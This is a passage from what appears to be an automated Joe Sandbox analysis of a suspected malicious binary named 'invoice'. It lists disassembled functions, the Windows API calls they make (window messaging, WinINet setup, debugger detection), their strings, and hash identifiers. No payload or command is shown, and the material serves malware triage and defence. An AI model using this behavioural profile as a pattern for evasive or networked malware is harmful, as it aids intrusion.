                        • Instruction ID: 7a772b446c8a47b9ab93b2c60d6e2fdf2066358340ead9311ab64a1dedec0321
                        • Opcode Fuzzy Hash: 8ec62dfb1a264808893db1fa4355e0e41ad820c78ef3f98484b5295aa9bdbc2b
                        • Instruction Fuzzy Hash: B3215C7291020AAFEB15DFA8DC45EFA7BE9FB08304F004629F995D2180D636E861DB50
                        Function 01006952 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 64windowCOMMON
                        Download Yara Rule
                        APIs
                        • GetWindowTextLengthW.USER32(00000000), ref: 010069D4
                        • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 010069E3
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: LengthMessageSendTextWindow
                        • String ID: edit
                        • API String ID: 2978978980-2167791130
                        • Opcode ID: 555521e620fb020fb58ea73b8bcfb9dbe4d97d9a1f23e7f9adc8892760a6618d
                        • Instruction ID: 229157cf3861567773518ae83529fca77387c0e5c143946dbfe0f88fe2e3a34d
                        • Opcode Fuzzy Hash: 555521e620fb020fb58ea73b8bcfb9dbe4d97d9a1f23e7f9adc8892760a6618d
                        • Instruction Fuzzy Hash: 38119D71100205ABFB628F78DC40AEB37AEEB05368F504724FAE0975D0C6369CA19760
                        Function 00FE2CA7 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63windowCOMMON
                        Download Yara Rule
                        APIs
                        • _memset.LIBCMT ref: 00FE2D1A
                        • GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 00FE2D39
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: InfoItemMenu_memset
                        • String ID: 0
                        • API String ID: 2223754486-4108050209
                        • Opcode ID: 8fdd00cf2a8f4fa23b9f121e74cfe82cf32b751fe1ab6092b380b087b824a6fc
                        • Instruction ID: 5a352790430bedc4d9498a807e9947ad74ee7a481a23a5e56321c5633afb1ac1
                        • Opcode Fuzzy Hash: 8fdd00cf2a8f4fa23b9f121e74cfe82cf32b751fe1ab6092b380b087b824a6fc
                        • Instruction Fuzzy Hash: 26113872E01254ABDB70DF5DCC84BAD73BDAB06320F140025ED42EB2A0E730AE05E791
                        Function 00FF22EC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62networkCOMMON
                        Download Yara Rule
                        APIs
                        • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 00FF2342
                        • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00FF236B
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: Internet$OpenOption
                        • String ID: <local>
                        • API String ID: 942729171-4266983199
                        • Opcode ID: c1cd9fbb3bc6ca188be269a7045a7d516133837766c5ea8eaa4f2fc93298915c
                        • Instruction ID: dd8a6664522b3b46b3a39b3bb091d5b83249809fade867a57c14bd7b81eae2ad
                        • Opcode Fuzzy Hash: c1cd9fbb3bc6ca188be269a7045a7d516133837766c5ea8eaa4f2fc93298915c
                        • Instruction Fuzzy Hash: 281106B1901229BADB258F128CC9FFBFB6CFF05365F10811AF64996110D3786841E6F1
                        Function 00FD90C7 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52windowCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 00F87F41: _memmove.LIBCMT ref: 00F87F82
                          • Part of subcall function 00FDAEA4: GetClassNameW.USER32(?,?,000000FF), ref: 00FDAEC7
                        • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00FD9135
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: ClassMessageNameSend_memmove
                        • String ID: ComboBox$ListBox
                        • API String ID: 372448540-1403004172
                        • Opcode ID: a52d3a79182363fe7d803315f82aa9bb7ee2abffc27ec5e2bb88e84f9dc5953e
                        • Instruction ID: 0e7f0ea9169eb9810fa6fcdd889eb1c2f973993d5f3ae8fece056ca2e68f0367
                        • Opcode Fuzzy Hash: a52d3a79182363fe7d803315f82aa9bb7ee2abffc27ec5e2bb88e84f9dc5953e
                        • Instruction Fuzzy Hash: 4501F571A45215ABCB04FBA5CC959FE736AEF0A320B18070AF872573C1DA395808E750
                        Function 00FE8E3A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 51COMMON
                        Download Yara Rule
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: __fread_nolock_memmove
                        • String ID: EA06
                        • API String ID: 1988441806-3962188686
                        • Opcode ID: 23a5ab73afa2df8524525983f2f6f7cef6299d6cb463abef030d901de5bdface
                        • Instruction ID: 5bfc7707c5bc7b5050fd4938cc9a08a34edf828c15bd0317135b1a682f5b8fb9
                        • Opcode Fuzzy Hash: 23a5ab73afa2df8524525983f2f6f7cef6299d6cb463abef030d901de5bdface
                        • Instruction Fuzzy Hash: 0701F972C042587EDB28D7A9CC16EEE7BFCDB01701F00459EF556D2181E9B9AA089760
                        Function 00FD8FBF Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50windowCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 00F87F41: _memmove.LIBCMT ref: 00F87F82
                          • Part of subcall function 00FDAEA4: GetClassNameW.USER32(?,?,000000FF), ref: 00FDAEC7
                        • SendMessageW.USER32(?,00000180,00000000,?), ref: 00FD902D
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: ClassMessageNameSend_memmove
                        • String ID: ComboBox$ListBox
                        • API String ID: 372448540-1403004172
                        • Opcode ID: d71d474ab7fb6960750a5005d0d3bfa1f0b41bb3ba60776d9df7591c88f78960
                        • Instruction ID: 89c4d30fc9a24b1c278fdd93bae56de86bc76d3a51c92fa67aa85b96dda5de94
                        • Opcode Fuzzy Hash: d71d474ab7fb6960750a5005d0d3bfa1f0b41bb3ba60776d9df7591c88f78960
                        • Instruction Fuzzy Hash: FD01F771A452046BCB14F7A1CC96EFE73ADDF05740F28011AB84267381DE299E08F3B1
                        Function 00FD9044 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49windowCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 00F87F41: _memmove.LIBCMT ref: 00F87F82
                          • Part of subcall function 00FDAEA4: GetClassNameW.USER32(?,?,000000FF), ref: 00FDAEC7
                        • SendMessageW.USER32(?,00000182,?,00000000), ref: 00FD90B0
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: ClassMessageNameSend_memmove
                        • String ID: ComboBox$ListBox
                        • API String ID: 372448540-1403004172
                        • Opcode ID: 5d583e3fda87e663d7988fb5e1a6e15d330ee856f040318bdd19bf2d944ddc8a
                        • Instruction ID: 6ab94441bec831e2d7bad427a6f44c60984905270226731db3f1f5d4d89b6e5f
                        • Opcode Fuzzy Hash: 5d583e3fda87e663d7988fb5e1a6e15d330ee856f040318bdd19bf2d944ddc8a
                        • Instruction Fuzzy Hash: 59012B71A4520467CB14F7B5CC86EFE73AD9F04700F280116780263342DA299E08F3B1
                        Function 00FE4FCF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 29COMMON
                        Download Yara Rule
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: ClassName_wcscmp
                        • String ID: #32770
                        • API String ID: 2292705959-463685578
                        • Opcode ID: 0bcba11d74f775b8c1ad3f6bad61865b474f20ddb4c6e64dee5babf8718d4e6a
                        • Instruction ID: 3d47b92e299538f6898d2b5a7a2b584a99562792a0c3961765ad013b79fb53fe
                        • Opcode Fuzzy Hash: 0bcba11d74f775b8c1ad3f6bad61865b474f20ddb4c6e64dee5babf8718d4e6a
                        • Instruction Fuzzy Hash: 17E06872A0032A2BD7309A9AAC09FA7F7ACEB42B30F00005BFD44D3140E661AA0587E1
                        Function 00FBB441 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22COMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 00FBB494: _memset.LIBCMT ref: 00FBB4A1
                          • Part of subcall function 00FA0AC0: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,00FBB470,?,?,?,00F8100A), ref: 00FA0AC5
                        • IsDebuggerPresent.KERNEL32(?,?,?,00F8100A), ref: 00FBB474
                        • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,00F8100A), ref: 00FBB483
                        Strings
                        • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00FBB47E
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString_memset
                        • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                        • API String ID: 3158253471-631824599
                        • Opcode ID: 2a8da6adbd55f44298814bc1c50409e23fcb604b1c766c6dd6e732e4ad62ad66
                        • Instruction ID: 133ad0f89d478ee1f83337410376f4a4ec55150c361c2840594a4d3fc9331326
                        • Opcode Fuzzy Hash: 2a8da6adbd55f44298814bc1c50409e23fcb604b1c766c6dd6e732e4ad62ad66
                        • Instruction Fuzzy Hash: A1E06DB4200712CFD731DF65E9047827BE4BF00314F018A2DE4C6C6242EBB9E444EBA1
                        Function 010059CD Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON
                        Download Yara Rule
                        APIs
                        • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 010059D7
                        • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 010059EA
                          • Part of subcall function 00FE52EB: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00FE5363
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: FindMessagePostSleepWindow
                        • String ID: Shell_TrayWnd
                        • API String ID: 529655941-2988720461
                        • Opcode ID: 8214317708142b6f5d0ce12d7482d7055d38a8cab50595ff73265fde803470d5
                        • Instruction ID: d7ffb7b441457352e24de619a885067c21b4cd2eac1e03bad1f5025a9f36425e
                        • Opcode Fuzzy Hash: 8214317708142b6f5d0ce12d7482d7055d38a8cab50595ff73265fde803470d5
                        • Instruction Fuzzy Hash: F5D01231384312B7E679BB719C0FFD77A18BB44F51F00092AB395AA1C4C9FAA900D754
                        Function 01005A01 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON
                        Download Yara Rule
                        APIs
                        • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 01005A17
                        • PostMessageW.USER32(00000000), ref: 01005A1E
                          • Part of subcall function 00FE52EB: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00FE5363
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: FindMessagePostSleepWindow
                        • String ID: Shell_TrayWnd
                        • API String ID: 529655941-2988720461
                        • Opcode ID: 5d057e93e45a21a35fbfe8258fdfcb4e4331aeeaa9b694ca5d9b8c48bed7f715
                        • Instruction ID: 255802deb0408f1ff2d29867d11ed714e8d8bf645fbe587c14b0c1ca06a68bcf
                        • Opcode Fuzzy Hash: 5d057e93e45a21a35fbfe8258fdfcb4e4331aeeaa9b694ca5d9b8c48bed7f715
                        • Instruction Fuzzy Hash: 5DD0C9313843127BE679AB719C0FF967618AB44B51F00092AB395AA1C4C9EAA9009754